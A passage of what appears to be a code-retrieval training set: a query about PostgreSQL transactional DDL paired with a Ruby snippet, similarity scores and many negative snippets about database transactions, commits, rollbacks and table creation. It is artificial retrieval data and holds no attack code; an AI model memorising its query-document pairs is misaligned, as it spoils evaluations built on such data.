"def transaction\n raise Mysql::Error, 'Not Connected' if @my.nil?\n\n if block_given?\n begin\n @my.query('START TRANSACTION WITH CONSISTENT SNAPSHOT')\n yield # Start executing the query black.\n @my.query('COMMIT')\n rescue Mysql::Error => e\n @my.query('ROLLBACK')\n raise e\n end\n end\n end",
"def begin\n db.transaction do\n yield\n end\n end",
"def transaction(&block); end",
"def begin_db_transaction\n @transaction = @connection.transaction('READ COMMITTED')\n end",
"def perform_atomic_update(&block)\n Edition.connection.execute \"set transaction isolation level serializable\"\n Edition.connection.transaction do\n yield\n end\n end",
"def supports_transaction_isolation_level?(level)\n @connection.supports_transaction_isolation?(level)\n end",
"def transaction( &block )\n connect do | conn |\n conn.transaction do | conn |\n yield SqlRunner.new(SingleConnectionPool.new( conn ))\n end\n end\n end",
"def transaction(&block)\n raise InvalidDbError if @stale\n\n return transaction_in_staging(true, &block) if self.staging?\n\n begin\n transaction_in_staging(false, &block)\n ensure\n self.unstage\n end\n end",
"def transaction\n @database.transaction { yield self }\n end",
"def transaction\n start\n yield self\n rescue Object => ex\n rollback\n debug \"#{ex.class}: #{ex.message}\"\n ex.backtrace.each { |line| debug line }\n else\n commit\n end",
"def transaction\n begin\n if block_given?\n begin_db_transaction\n result = yield\n commit_db_transaction\n result\n end\n rescue Exception => database_transaction_rollback\n rollback_db_transaction\n raise\n end\n end",
"def begin_transaction\n return System.begin_transaction\n end",
"def transaction(&block)\n @in_transaction += 1\n begin\n yield self\n self.commit if @in_transaction > 0\n rescue => e\n self.rollback\n raise e\n ensure\n @in_transaction -= 1 unless @in_transaction == 0\n end\n end",
"def transaction(object)\n object.db.transaction {raise ::Sequel::Error::Rollback unless yield}\n end",
"def transaction(&block)\n yield\n commit\n end",
"def transaction\n use do |connection|\n connection.transaction do |conn|\n begin\n yield conn\n rescue Rollback\n return\n end\n end\n end\n end",
"def transaction(start_db_transaction=true)\n yield\n end",
"def begin_isolated_db_transaction(isolation)\n log(\"BEGIN ISOLATED - #{isolation}\", 'TRANSACTION') { @connection.begin(isolation) }\n end",
"def test_transactions(table=\"test_monetdb_transactions\", columndefs=['col1 INT', 'col2 VARCHAR(255)'])\n test_create_table(table, columndefs)\n \n data = [1, 'aa'] \n values = \"\"\n \n data.each do |d| values += '\\'' + d.to_s + '\\'' + ',' end\n values = values.chop # remove last ',' character \n \n insert = \"INSERT INTO \" + table + \" VALUES \" + \" ( \" + values + \" )\"\n \n @db.query('START TRANSACTION')\n @db.auto_commit(flag=false) # if @db.auto_commit?\n @db.query(insert)\n\n @db.query(\"COMMIT\") \n \n res = @db.query('SELECT * FROM ' + table)\n rows_committed = res.fetch_all\n res.free\n \n # create a save point\n @db.save\n @db.query(\"SAVEPOINT #{@db.transactions} ;\")\n \n @db.query(insert)\n \n # rollback to savepoint\n @db.query(\"ROLLBACK TO SAVEPOINT #{@db.transactions};\")\n @db.release\n \n res = @db.query('SELECT * FROM ' + table)\n rows_rolled_back = res.fetch_all\n res.free\n \n assert_equal(rows_committed, rows_rolled_back)\n \n # restore autocommit for remaining tests\n @db.auto_commit(flag=true) \n end",
"def run_transaction(conn, op)\n retries = 0\n max_retries = 3\n while true\n retries += 1\n if retries == max_retries\n err = \"Transaction did not succeed after #{retries} retries\"\n raise err\n end\n\n begin\n op.call(conn)\n\n # If we reach this point, we were able to commit, so we break\n # from the retry loop.\n break\n\n rescue PG::TRSerializationFailure\n # This is a retry error, so we roll back the current\n # transaction and sleep for a bit before retrying. The\n # sleep time increases for each failed transaction.\n # conn.rollback\n puts \"EXECUTE SERIALIZATION_FAILURE BRANCH\"\n sleep_secs = (2**retries).floor\n puts \"Sleeping for #{sleep_secs} seconds\"\n sleep(sleep_secs)\n next\n end\n end\nend",
"def transaction(mode = :deferred, &block)\n @db.transaction(mode, &block)\n end",
"def with_connection\n ActiveRecord::Base.connection_pool.with_connection do |connection|\n connection.transaction do\n if connection.adapter_name == \"PostgreSQL\"\n connection.execute \"SET TRANSACTION READ ONLY\"\n connection.execute \"SET LOCAL statement_timeout = 100\"\n # TODO support equivalent options for other adapters (such as mysql)\n end\n\n yield connection\n end\n end\n end",
"def transaction\n start_transaction\n\n yield\n ensure\n end_transaction if transaction_started?\n end",
"def begin_db_transaction\n @connection.autocommit = false\n end",
"def restart_transaction\n ActiveRecord::Base.connection.execute(\"COMMIT\")\n ActiveRecord::Base.connection.execute(\"BEGIN\")\n end",
"def set_transaction_isolation(conn, opts)\n level = opts.fetch(:isolation, transaction_isolation_level)\n read_only = opts[:read_only]\n deferrable = opts[:deferrable]\n if level || !read_only.nil? || !deferrable.nil?\n sql = String.new\n sql << \"SET TRANSACTION\"\n sql << \" ISOLATION LEVEL #{Sequel::Database::TRANSACTION_ISOLATION_LEVELS[level]}\" if level\n sql << \" READ #{read_only ? 'ONLY' : 'WRITE'}\" unless read_only.nil?\n sql << \" #{'NOT ' unless deferrable}DEFERRABLE\" unless deferrable.nil?\n log_connection_execute(conn, sql)\n end\n end",
"def commit_db_transaction() end",
"def commit_db_transaction() end",
"def transaction(&block)\n ActiveRecord::Base.transaction(&block)\n end",
"def begin_db_transaction\n # PG driver doesn't really do anything on setAutoCommit(false)\n # except for commit-ing a previous pending transaction if any\n log('/* BEGIN */') { @connection.begin }\n end",
"def rollback_db_transaction() end",
"def rollback_db_transaction() end",
"def with_transaction(&block)\n base_model.transaction(&block)\n end",
"def checked_transaction(opts=OPTS)\n use_transaction?(opts) ? db.transaction({:server=>this_server}.merge!(opts)){yield} : yield\n end",
"def checked_transaction(opts=OPTS)\n use_transaction?(opts) ? db.transaction({:server=>this_server}.merge!(opts)){yield} : yield\n end",
"def transaction(opts={:auto_enable => false})\n @transaction_level||=0\n @transaction_level+=1\n session do\n raise_if_transaction_running\n @transaction ||= true\n raise Error.cannot_obtain_transaction_lock if not lock_transaction\n begin\n yield\n # get_transaction in case cfgsave or cfgenable was run in transaction block\n # if there is no transaction we do not need to run it\n # if there is transaction but opend by someone else then t\n cfg_save if @transaction_level==1 && get_transaction\n rescue => e\n abort_transaction\n raise e\n end \n end\n ensure\n @transaction_level-=1\n @transaction = nil if @transaction_level==0\n end",
"def within_transaction(object); end",
"def ddl_transaction(migration)\n if use_transaction?(migration)\n ActiveRecord::Base.transaction { yield }\n else\n yield\n end\n end",
"def begin_transaction(conn, opts={})\n set_transaction_isolation(conn, opts)\n super\n end",
"def supports_transactional_ddl?\n true\n end",
"def with_transaction(read_only: false, &block)\n @env.transaction(read_only, &block)\n end",
"def in_transaction(opts = {})\n yield\n end",
"def transaction(&block)\n yield\n end",
"def transaction(&block)\n yield\n end",
"def locked_transaction(&block)\n unless connection.open_transactions.zero?\n raise \"locked_transaction cannot be called from within another transaction!\"\n end\n unsafe_locked_transaction do\n yield if block_given?\n end\n end",
"def transaction(&block)\n @@semaphore.synchronize{\n block.call\n }\n end",
"def begin_db_transaction\n log('begin transaction', nil) do\n begin_isolated_db_transaction(default_transaction_isolation)\n end\n end",
"def create_or_update_with_transaction\n Assessment.transaction do\n create_or_update_without_transaction\n end\n end",
"def supports_transactional_ddl?\n false\n end",
"def supports_prepared_transactions?\n false\n end",
"def transaction(session, access_mode = :write)\n if !block_given?\n tx = self.class.transaction_class.new(session)\n tx.access_mode = access_mode\n tx.begin\n return tx\n end\n\n begin\n tx = transaction(session, access_mode)\n yield tx\n rescue => e\n tx.mark_failed if tx\n raise e\n ensure\n tx.close if tx\n end\n end",
"def transaction(&block)\n db\n persister\n\n result = nil\n start_time = Time.now\n begin\n db.transaction(:rollback => :reraise, :isolation => :repeatable,\n :retry_on => @retry_on_error, :num_retries => 3) do\n result = yield block\n end\n total = Time.now.to_ms - start_time.to_ms\n debug \"Transaction committed (#{total} ms)\"\n result\n rescue StandardError => e\n total = Time.now.to_ms - start_time.to_ms\n warn \"Transaction failed (#{total} ms)\"\n raise e\n ensure\n GC.start\n end\n end",
"def begin_db_transaction\n execute(\"BEGIN\")\n end",
"def begin_db_transaction\n execute(\"BEGIN\")\n end",
"def transaction(options={}, &block)\n connection.transaction(options.update(:requires_new => true), &block)\n end",
"def outside_transaction\n # ActiveRecord manages connections per-thread, so the only way to\n # convince it to open another connection is to start another thread.\n thread = Thread.new do\n begin\n yield\n end\n end\n thread.value\n end",
"def set_transaction_isolation(conn, opts)\n level = opts.fetch(:isolation, transaction_isolation_level)\n if (jdbc_level = JDBC_TRANSACTION_ISOLATION_LEVELS[level]) &&\n conn.getMetaData.supportsTransactionIsolationLevel(jdbc_level)\n _trans(conn)[:original_jdbc_isolation_level] = conn.getTransactionIsolation\n log_connection_yield(\"Transaction.isolation_level = #{level}\", conn){conn.setTransactionIsolation(jdbc_level)}\n end\n end",
"def transaction(opts = {})\n commit, rollback = start_transaction! opts\n tx_depth = nil\n begin\n if Pacer.verbose == :very\n tx_depth = threadlocal_graph_info[:dx_depth]\n puts \"--#{self.class.name} transaction #{ tx_depth } --> \"\n puts caller[0,3]\n end\n r = yield commit, rollback\n commit.call(false)\n r\n rescue Exception => e\n rollback.call e.message\n raise\n ensure\n puts \"--#{self.class.name} #{ tx_depth } <-- \" if Pacer.verbose == :very\n finish_transaction!\n end\n end",
"def transaction(&block)\n self['AutoCommit'] = false\n self.do_transaction(&block)\n self['AutoCommit'] = true\n end",
"def test_transaction_single_op1()\n conn = Scalaroid::TransactionSingleOp.new()\n conn.close_connection()\n end",
"def start_transaction!\n fail DbMod::Exceptions::AlreadyInTransaction if @in_transaction\n @in_transaction = true\n\n query 'BEGIN'\n end",
"def exec_rollback_db_transaction\n @connection.rollback\n @connection.autocommit = true\n end",
"def transaction\n raise ArgumentError, 'No block was given' unless block_given?\n\n with_client do |client|\n begin\n client.query('BEGIN')\n yield client\n client.query('COMMIT')\n rescue StandardError => e\n client.query('ROLLBACK')\n raise e\n end\n end\n end",
"def testTransactionSingleOp1()\n conn = Scalaris::TransactionSingleOp.new()\n conn.close_connection()\n end",
"def testTransactionSingleOp1()\n conn = Scalaris::TransactionSingleOp.new()\n conn.close_connection()\n end",
"def test_transaction1()\n t = Scalaroid::Transaction.new()\n t.close_connection()\n end",
"def scaffold_transaction(&block)\n transaction(&block)\n end",
"def lint_transaction_support\n result = gateway_instance.transaction { 1 }\n\n complain \"#{gateway_instance} must return the result of a transaction block\" if result != 1\n\n gateway_instance.transaction do |t|\n t.rollback!\n\n complain \"#{gateway_instance} must interrupt a transaction on rollback\"\n end\n end",
"def transaction\n sanity_check\n raise InterfaceError, \"No block given\" unless block_given?\n\n commit\n begin\n yield self\n commit\n rescue Exception\n rollback\n raise\n end\n end",
"def transaction(&block)\n block.call\n end",
"def commit_transaction_sql\n SQL_COMMIT\n end",
"def commit_transaction_sql\n SQL_COMMIT\n end",
"def begin_transaction_sql\n SQL_BEGIN\n end",
"def begin_transaction_sql\n SQL_BEGIN\n end"
] |
[
"0.7294652",
"0.72276586",
"0.7209305",
"0.7209305",
"0.70683",
"0.699975",
"0.69545364",
"0.69545364",
"0.6950709",
"0.6950709",
"0.6924159",
"0.6880454",
"0.68508345",
"0.68450475",
"0.6827295",
"0.67907196",
"0.6744684",
"0.6744684",
"0.6744684",
"0.6701072",
"0.6701072",
"0.6660656",
"0.6650508",
"0.66397125",
"0.6625763",
"0.6625763",
"0.6625118",
"0.6612366",
"0.66026217",
"0.6599777",
"0.65828",
"0.6577545",
"0.6556991",
"0.64979583",
"0.64602906",
"0.6458438",
"0.64489406",
"0.6408846",
"0.6407302",
"0.63959855",
"0.638133",
"0.63756317",
"0.6370918",
"0.6344547",
"0.63113153",
"0.6306036",
"0.6301762",
"0.62911433",
"0.6287692",
"0.6279948",
"0.6275571",
"0.6271097",
"0.62569577",
"0.62569577",
"0.62506515",
"0.62503135",
"0.622293",
"0.622293",
"0.621971",
"0.62162894",
"0.62162894",
"0.6215919",
"0.6208216",
"0.61911637",
"0.618761",
"0.61767846",
"0.61713696",
"0.61686397",
"0.61636716",
"0.61636716",
"0.61629426",
"0.60825026",
"0.6048111",
"0.6034665",
"0.6019471",
"0.6018151",
"0.60181415",
"0.6009271",
"0.6005047",
"0.6005047",
"0.5981113",
"0.5980937",
"0.59787434",
"0.5975502",
"0.59700763",
"0.59601295",
"0.5955306",
"0.59483445",
"0.5933916",
"0.59137905",
"0.59137905",
"0.59009737",
"0.588837",
"0.58642447",
"0.5862583",
"0.58606905",
"0.5843217",
"0.5843217",
"0.5836062",
"0.5836062"
] |
0.7193443
|
4
|
PostgreSQL supports transaction DDL statements.
|
def supports_transactional_ddl?
true
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def supports_transactional_ddl?\n false\n end",
"def begin_db_transaction\n execute(\"BEGIN\")\n end",
"def begin_db_transaction\n execute(\"BEGIN\")\n end",
"def supports_ddl_transactions?\n false\n end",
"def supports_ddl_transactions?\n false\n end",
"def supports_ddl_transactions?\n false\n end",
"def ddl_transaction(migration)\n if use_transaction?(migration)\n ActiveRecord::Base.transaction { yield }\n else\n yield\n end\n end",
"def begin_transaction_sql\n SQL_BEGIN\n end",
"def begin_transaction_sql\n SQL_BEGIN\n end",
"def commit_transaction_sql\n SQL_COMMIT\n end",
"def commit_transaction_sql\n SQL_COMMIT\n end",
"def transaction; end",
"def transaction; end",
"def transaction; end",
"def scaffold_transaction(&block)\n transaction(&block)\n end",
"def begin_db_transaction\n # PG driver doesn't really do anything on setAutoCommit(false)\n # except for commit-ing a previous pending transaction if any\n log('/* BEGIN */') { @connection.begin }\n end",
"def rollback_db_transaction() end",
"def rollback_db_transaction() end",
"def commit_db_transaction\n execute(\"COMMIT\")\n end",
"def commit_db_transaction\n execute(\"COMMIT\")\n end",
"def begin_db_transaction() end",
"def begin_db_transaction() end",
"def create_products_table\n c = PGconn.new(:host => \"localhost\", :dbname => dbname)\n c.exec %q{\n CREATE TABLE products (\n id SERIAL PRIMARY KEY,\n name varchar(255),\n price decimal,\n description text\n );\n }\n c.close\nend",
"def TransactionBegin()\n\t@dbh.do(\"BEGIN\")\nend",
"def exec_rollback_db_transaction\n @connection.rollback\n @connection.autocommit = true\n end",
"def begin_db_transaction\n @connection.autocommit = false\n end",
"def commit_db_transaction() end",
"def commit_db_transaction() end",
"def prepare_db_for_restore\n raise \"restore unimplemented for #{adapter}\" unless (adapter = @db_conf[:adapter]) == 'postgresql'\n query = \"SELECT table_name FROM information_schema.tables WHERE table_schema='public' AND table_type='BASE TABLE'\"\n cmd = \"psql #{@db_conf[:database]} -t -c \\\"#{query}\\\"\"\n puts \"Executing: '#{cmd}'\"\n tables = `#{cmd}`\n\n query = \"DROP TABLE #{tables.map(&:chomp).map(&:strip).reject(&:empty?).join(\", \")} CASCADE\"\n cmd = \"psql #{@db_conf[:database]} -t -c \\\"#{query}\\\"\"\n puts \"Executing: '#{cmd}'\"\n `#{cmd}`\n end",
"def create_table\n puts \"Creating table >> PEOPLE\"\n $db.execute %q{\n CREATE TABLE people(\n id integer primary key,\n name varchar(50),\n job varchar(50),\n gender varchar(6),\n age integer\n )\n }\nend",
"def create_database\n $conn.exec(\"\"\"\n CREATE TABLE users (\n id SERIAL NOT NULL,\n name varchar(255) NOT NULL,\n created_at timestamp NOT NULL,\n PRIMARY KEY (id)\n );\n CREATE UNIQUE INDEX user_names ON users (name);\n CREATE TABLE blathers (\n id SERIAL NOT NULL,\n text varchar(141) NOT NULL,\n created_at timestamp NOT NULL,\n user_id integer NOT NULL,\n PRIMARY KEY (id)\n );\n CREATE TABLE blathers_mentioned_users (\n blather_id integer NOT NULL,\n user_id integer NOT NULL,\n PRIMARY KEY (blather_id, user_id)\n );\n \"\"\")\nend",
"def test_transactions(table=\"test_monetdb_transactions\", columndefs=['col1 INT', 'col2 VARCHAR(255)'])\n test_create_table(table, columndefs)\n \n data = [1, 'aa'] \n values = \"\"\n \n data.each do |d| values += '\\'' + d.to_s + '\\'' + ',' end\n values = values.chop # remove last ',' character \n \n insert = \"INSERT INTO \" + table + \" VALUES \" + \" ( \" + values + \" )\"\n \n @db.query('START TRANSACTION')\n @db.auto_commit(flag=false) # if @db.auto_commit?\n @db.query(insert)\n\n @db.query(\"COMMIT\") \n \n res = @db.query('SELECT * FROM ' + table)\n rows_committed = res.fetch_all\n res.free\n \n # create a save point\n @db.save\n @db.query(\"SAVEPOINT #{@db.transactions} ;\")\n \n @db.query(insert)\n \n # rollback to savepoint\n @db.query(\"ROLLBACK TO SAVEPOINT #{@db.transactions};\")\n @db.release\n \n res = @db.query('SELECT * FROM ' + table)\n rows_rolled_back = res.fetch_all\n res.free\n \n assert_equal(rows_committed, rows_rolled_back)\n \n # restore autocommit for remaining tests\n @db.auto_commit(flag=true) \n end",
"def on_prepare_transaction_commit(unit, transaction); end",
"def create_table\n puts \"Creating people table\"\n $db.execute %q{\n CREATE TABLE people(\n id integer primary key,\n name varchar(50),\n job varchar(50),\n gender varchar(6),\n age integer\n )\n }\nend",
"def transaction(&block); end",
"def use_transactions; end",
"def use_transactions; end",
"def within_transaction; end",
"def within_transaction; end",
"def create_schema\n puts \"Preparing table\"\n\n \tquery = <<-QUERY\n \t\tCREATE TABLE tasks (\n \t\t\tid INTEGER PRIMARY KEY,\n \t\t\ttitle TEXT NOT NULL,\n \t\t\tdescription TEXT,\n \t\t\tcompleted TEXT\n \t\t);\n \tQUERY\n db.execute(\"DROP TABLE IF EXISTS tasks;\")\n \tdb.execute(query)\n\n puts \"Table creation completed!\"\n\n end",
"def restart_transaction\n ActiveRecord::Base.connection.execute(\"COMMIT\")\n ActiveRecord::Base.connection.execute(\"BEGIN\")\n end",
"def rollback_db_transaction\n execute(\"ROLLBACK\")\n end",
"def rollback_db_transaction\n execute(\"ROLLBACK\")\n end",
"def transaction(options={}, &block)\n connection.transaction(options.update(:requires_new => true), &block)\n end",
"def initial_commit?; end",
"def initial_commit?; end",
"def transaction(&block)\n yield\n commit\n end",
"def transaction\n start\n yield self\n rescue Object => ex\n rollback\n debug \"#{ex.class}: #{ex.message}\"\n ex.backtrace.each { |line| debug line }\n else\n commit\n end",
"def transaction(start_db_transaction=true)\n yield\n end",
"def begin_db_transaction\n @transaction = @connection.transaction('READ COMMITTED')\n end",
"def create_movies_table\n c = PGconn.new(:host => \"localhost\", :dbname => \"test\")\n c.exec %q{\n CREATE TABLE movies (\n id PRIMARY KEY,\n title TEXT,\n description TEXT,\n rating INTEGER\n );\n }\n c.close\nend",
"def rollback_transaction_sql\n SQL_ROLLBACK\n end",
"def rollback_transaction_sql\n SQL_ROLLBACK\n end",
"def commit_transaction(tx)\n tx.execute\n end",
"def install_on(db, options = {})\n execute_ddl(db, 'BEGIN', options)\n all_objects_in_order.each{|o| \n sql = o.to_create_sql(db)\n execute_ddl(db, sql, options) unless sql.nil? or sql.empty?\n }\n execute_ddl(db, 'COMMIT', options)\n db\n end",
"def lint_transaction_support\n result = gateway_instance.transaction { 1 }\n\n complain \"#{gateway_instance} must return the result of a transaction block\" if result != 1\n\n gateway_instance.transaction do |t|\n t.rollback!\n\n complain \"#{gateway_instance} must interrupt a transaction on rollback\"\n end\n end",
"def begin_db_transaction\n log('BEGIN', 'TRANSACTION') { @connection.begin }\n end",
"def replace_statement(target, stage)\n <<-SQLREPLACE\n begin transaction;\n drop table #{target};\n alter table #{stage} rename to #{target};\n end transaction;\n SQLREPLACE\n end",
"def create_table(name, &block)\n DB.drop_table? name if @opts.drop_tables?\n DB.create_table? name.to_sym, &block\n info \"Setup database table: #{name}\"\n end",
"def commit; end",
"def commit; end",
"def commit; end",
"def start_transaction!\n fail DbMod::Exceptions::AlreadyInTransaction if @in_transaction\n @in_transaction = true\n\n query 'BEGIN'\n end",
"def create_table!(*args, &block)\n drop_table?\n create_table(*args, &block)\n end",
"def spanner_create_table_with_foreign_key_delete_cascade project_id:, instance_id:, database_id:\n db_admin_client = Google::Cloud::Spanner::Admin::Database.database_admin\n\n database_path = db_admin_client.database_path project: project_id,\n instance: instance_id,\n database: database_id\n\n job = db_admin_client.update_database_ddl database: database_path, statements: [\n %{ CREATE TABLE Customers (\n CustomerId INT64 NOT NULL,\n CustomerName STRING(62) NOT NULL,\n ) PRIMARY KEY (CustomerId)},\n %{ CREATE TABLE ShoppingCarts (\n CartId INT64 NOT NULL,\n CustomerId INT64 NOT NULL,\n CustomerName STRING(62) NOT NULL,\n CONSTRAINT FKShoppingCartsCustomerId FOREIGN KEY (CustomerId)\n REFERENCES Customers (CustomerId) ON DELETE CASCADE\n ) PRIMARY KEY (CartId)}\n ]\n\n puts \"Waiting for operation to complete...\"\n job.wait_until_done!\n puts \"Created Customers and ShoppingCarts table with FKShoppingCartsCustomerId \\\n foreign key constraint on database #{database_id} on instance #{instance_id}\"\nend",
"def drop_sequence_sql(name)\n \"DROP SEQUENCE #{name}\"\n end",
"def exec_rollback_db_transaction\n log('ROLLBACK', 'TRANSACTION') { @connection.rollback }\n end",
"def commit( transaction )\n fail NotImplementedError\n end",
"def drop_movies_table\n c = PGconn.new(:host => \"localhost\", :dbname => \"testdb\")\n c.exec \"DROP TABLE products;\"\n c.close\nend",
"def create!(con)\n con.exec create_stmt\n end",
"def transaction(object)\n object.db.transaction {raise ::Sequel::Error::Rollback unless yield}\n end",
"def ddl(string) # :nodoc:\n chk_conn\n execute(string)\n end",
"def commit_db_transaction\n @connection.commit\n @connection.autocommit = true\n end",
"def begin_transaction\n return System.begin_transaction\n end",
"def transaction(*sqls)\n begin\n db = SQLite3::Database.new(@@db_file)\n @@_set_db_handler.call(db)\n db.transaction do\n sqls.each do |sql|\n db.execute(sql)\n end\n end\n ensure\n db.close\n end\n end",
"def transaction(opts={}, &blk)\n Toshi.db.transaction(opts, &blk)\n end",
"def create_sync_state\n silence_ddl_notices(:left) do\n table_name = \"#{options[:rep_prefix]}_sync_state\"\n session.left.create_table \"#{options[:rep_prefix]}_sync_state\"\n session.left.add_column table_name, :table_name, :string\n session.left.add_column table_name, :state, :string\n session.left.remove_column table_name, 'id'\n session.left.add_big_primary_key table_name, 'id'\n end\n end",
"def begin\n db.transaction do\n yield\n end\n end",
"def create_authors(db)\r\n create_authors_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS authors(\r\n author_id INTEGER PRIMARY KEY,\r\n author_name VARCHAR(255)\r\n )\r\n SQL\r\n #create authors table\r\n db.execute(create_authors_cmd)\r\nend",
"def createUserTable\n @conn.exec(\"CREATEE users (id serial NOT NULL, name character varying(255), CONSTRAINT users_pkey PRIMARY KEY (id)) WITH (OIDS=FALSE);\");\n end",
"def create_table_sql(name, generator, options)\n a, b = super(name, generator, options), table_options_sql(options)\n \"#{a}\\n#{b}\"\n\t end",
"def postgresql_database\n # FIXME work in progress\n #encoding = \"-E #{configuration[:postgresql][:encoding]}\" if configuration[:postgresql][:encoding]\n encoding = ''\n template = \"-T #{configuration[:postgresql][:template_database]}\" if configuration[:postgresql][:template_database]\n\n exec \"postgresql_database\",\n :command => \"/usr/bin/createdb -O #{database_environment[:username]} #{encoding} #{template} #{database_environment[:database]}\",\n :unless => \"/usr/bin/psql -l | grep #{database_environment[:database]}\",\n :user => 'postgres',\n :require => exec('postgresql_user'),\n :before => exec('rake tasks')#,\n # :notify => exec('rails_bootstrap') # TODO make this configurable to work with multi_server\n end",
"def psql\n uri = generate_ingress_uri(\"Connecting\")\n ENV[\"PGPASSWORD\"] = uri.password\n ENV[\"PGSSLMODE\"] = 'require'\n system \"psql -U #{uri.user} -h #{uri.host} -p #{uri.port || 5432} #{uri.path[1..-1]}\"\n end",
"def create_book_condition(db)\r\n create_book_condition_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS book_condition(\r\n condition_id INTEGER PRIMARY KEY,\r\n condition_desc text(20)\r\n )\r\n SQL\r\n #create book_condition table\r\n db.execute(create_book_condition_cmd)\r\nend",
"def rollback_transaction(tx)\n # nothing to do\n end",
"def execute(sql, name = nil) \n # Only skip select statements from logging \n unless /^(select|show|begin|commit)/i.match(sql.strip) \n\t\tFile.open( File.join(RAILS_ROOT, 'db', 'ddl.sql'),'a') {|f|\n\t\t\ttemp_sql = sql.gsub(\"\\n\",\"\") \n\t\t\ttemp_sql = temp_sql + ';' if adapter_name != 'IBM_DB2' or adapter_name != 'IBM_DB'\n\t\t\tf.puts temp_sql\n\t\t}\n end\n\t old_execute sql, name\n end",
"def commit(transaction)\n raise NotImplementedError\n end",
"def transaction_disabled=(_arg0); end",
"def remove_transaction(conn)\n conn.setAutoCommit(true) if conn\n super\n end",
"def transaction(mode = :deferred, &block)\n @db.transaction(mode, &block)\n end",
"def create!(db, colls = nil)\n db.in_transaction do |conn|\n raise StandardError.new(\"Schema #{name} already created!\") unless schema_tables(conn).empty?\n end\n\n osm2pgsql_exec db, \"'#{empty_file}'\", \"creating osm2pgsql schema\"\n end",
"def init_conn_table(table_name)\n # Create destination table\n sql = <<SQL\ndrop table if exists #{table_name};\ncreate table #{table_name} (\n day timestamp, \n id int,\n value int,\n dw_created timestamp,\n dw_updated timestamp\n );\nSQL\n conn.run(sql)\n return conn\n end",
"def initDb\n @db.create_table! :tasks do\n primary_key :id\n Integer :created\n Integer :changed\n Integer :wake\n Integer :completed\n Integer :status\n String :title\n String :path\n String :data, :text=>TRUE\n end\n\n @db.create_table! :locks do\n Integer :id, :primary_key=>TRUE\n Integer :locked\n end\n end",
"def transaction(start_db_transaction = true)\n transaction_open = false\n begin\n if block_given?\n if start_db_transaction\n begin_db_transaction\n transaction_open = true\n end\n yield\n end\n rescue Exception => database_transaction_rollback\n if transaction_open\n transaction_open = false\n rollback_db_transaction\n end\n raise unless database_transaction_rollback.is_a? ActiveRecord::Rollback\n end\n ensure\n if transaction_open\n begin\n commit_db_transaction\n rescue Exception => database_transaction_rollback\n rollback_db_transaction\n raise\n end\n end\n end",
"def configure_postgres\n<<BASH\necho \"deb http://apt.postgresql.org/pub/repos/apt/ trusty-pgdg main\" > /etc/apt/sources.list.d/pgdg.list\nwget --quiet https://www.postgresql.org/media/keys/ACCC4CF8.asc\napt-key add ACCC4CF8.asc\napt-get update\napt-get install postgresql-9.2 -y\necho \"host all all #{CS_VM_ADDRESS}/32 md5\" >> /etc/postgresql/9.2/main/pg_hba.conf\necho \"listen_addresses='*'\" >> /etc/postgresql/9.2/main/postgresql.conf\nservice postgresql restart\nexport PATH=/usr/lib/postgresql/9.2/bin:$PATH\nsudo -u postgres psql -c \"CREATE USER bofh SUPERUSER ENCRYPTED PASSWORD 'i1uvd3v0ps';\"\nBASH\nend",
"def create_table_from_generator(name, generator, options)\n drop_statement, create_statements = create_table_sql_list(name, generator, options)\n (execute_ddl(drop_statement) rescue nil) if drop_statement\n create_statements.each{|sql| execute_ddl(sql)}\n end",
"def transaction\n start_transaction!\n\n result = yield\n\n query 'COMMIT'\n\n result\n rescue\n query 'ROLLBACK'\n raise\n\n ensure\n end_transaction!\n end",
"def drop_and_create_schema_migrations_table\n sql = [\n \"USE #{@database}\",\n 'DROP TABLE IF EXISTS schema_migrations',\n 'CREATE TABLE schema_migrations ( version varchar(255) COLLATE utf8_unicode_ci NOT NULL, UNIQUE KEY unique_schema_migrations (version)) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci'\n ]\n\n run_commands(sql)\n end",
"def rollback; end",
"def rollback; end"
] |
[
"0.7055532",
"0.69787323",
"0.69787323",
"0.68916005",
"0.68916005",
"0.68916005",
"0.6853812",
"0.6645684",
"0.6645684",
"0.6479298",
"0.6479298",
"0.64768124",
"0.64768124",
"0.64768124",
"0.6476242",
"0.6454384",
"0.6442726",
"0.6442726",
"0.6414321",
"0.6414321",
"0.6409704",
"0.6409704",
"0.64012444",
"0.6317183",
"0.62642574",
"0.624381",
"0.623209",
"0.623209",
"0.62139434",
"0.62116927",
"0.6184673",
"0.6161259",
"0.61471796",
"0.61436635",
"0.61263657",
"0.60702455",
"0.60702455",
"0.6064771",
"0.6064771",
"0.6033611",
"0.6014854",
"0.5990801",
"0.5990801",
"0.5981327",
"0.5955753",
"0.5955753",
"0.5951303",
"0.59511346",
"0.5929874",
"0.5927814",
"0.59186953",
"0.5909714",
"0.5909714",
"0.5891641",
"0.5873314",
"0.5868185",
"0.5848429",
"0.5848171",
"0.5827809",
"0.5824985",
"0.5824985",
"0.5824985",
"0.5815217",
"0.5807039",
"0.5793186",
"0.5792108",
"0.5787476",
"0.5779983",
"0.57721657",
"0.577139",
"0.5752157",
"0.5747943",
"0.57439953",
"0.5721898",
"0.5714632",
"0.5688772",
"0.5684309",
"0.56840247",
"0.56773275",
"0.5675763",
"0.56722283",
"0.56683373",
"0.5663497",
"0.56417316",
"0.56391805",
"0.5628432",
"0.56229854",
"0.56108844",
"0.5603816",
"0.55896443",
"0.5587215",
"0.5581341",
"0.5573446",
"0.5571338",
"0.5564642",
"0.55636364",
"0.55630124",
"0.55531996",
"0.55454576",
"0.55454576"
] |
0.725727
|
0
|
Array of symbols specifying table names in the current database. The dataset used is yielded to the block if one is provided, otherwise, an array of symbols of table names is returned. Options: :qualify :: Return the tables as Sequel::SQL::QualifiedIdentifier instances, using the schema the table is located in as the qualifier. :schema :: The schema to search :server :: The server to use
|
def tables(opts=OPTS, &block)
pg_class_relname(['r', 'p'], opts, &block)
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def tables\n table_names.map { |tn| table(tn) }\n end",
"def tables\n options.fetch(:tables)\n end",
"def tables(opts={})\n m = output_identifier_meth\n metadata_dataset.from(:information_schema__tables___t).\n select(:table_name).\n filter(:table_type=>'BASE TABLE', :table_schema=>(opts[:schema]||default_schema||'dbo').to_s).\n map{|x| m.call(x[:table_name])}\n end",
"def tables\n return enum_for(:tables) unless block_given?\n\n yield nil, rows\n end",
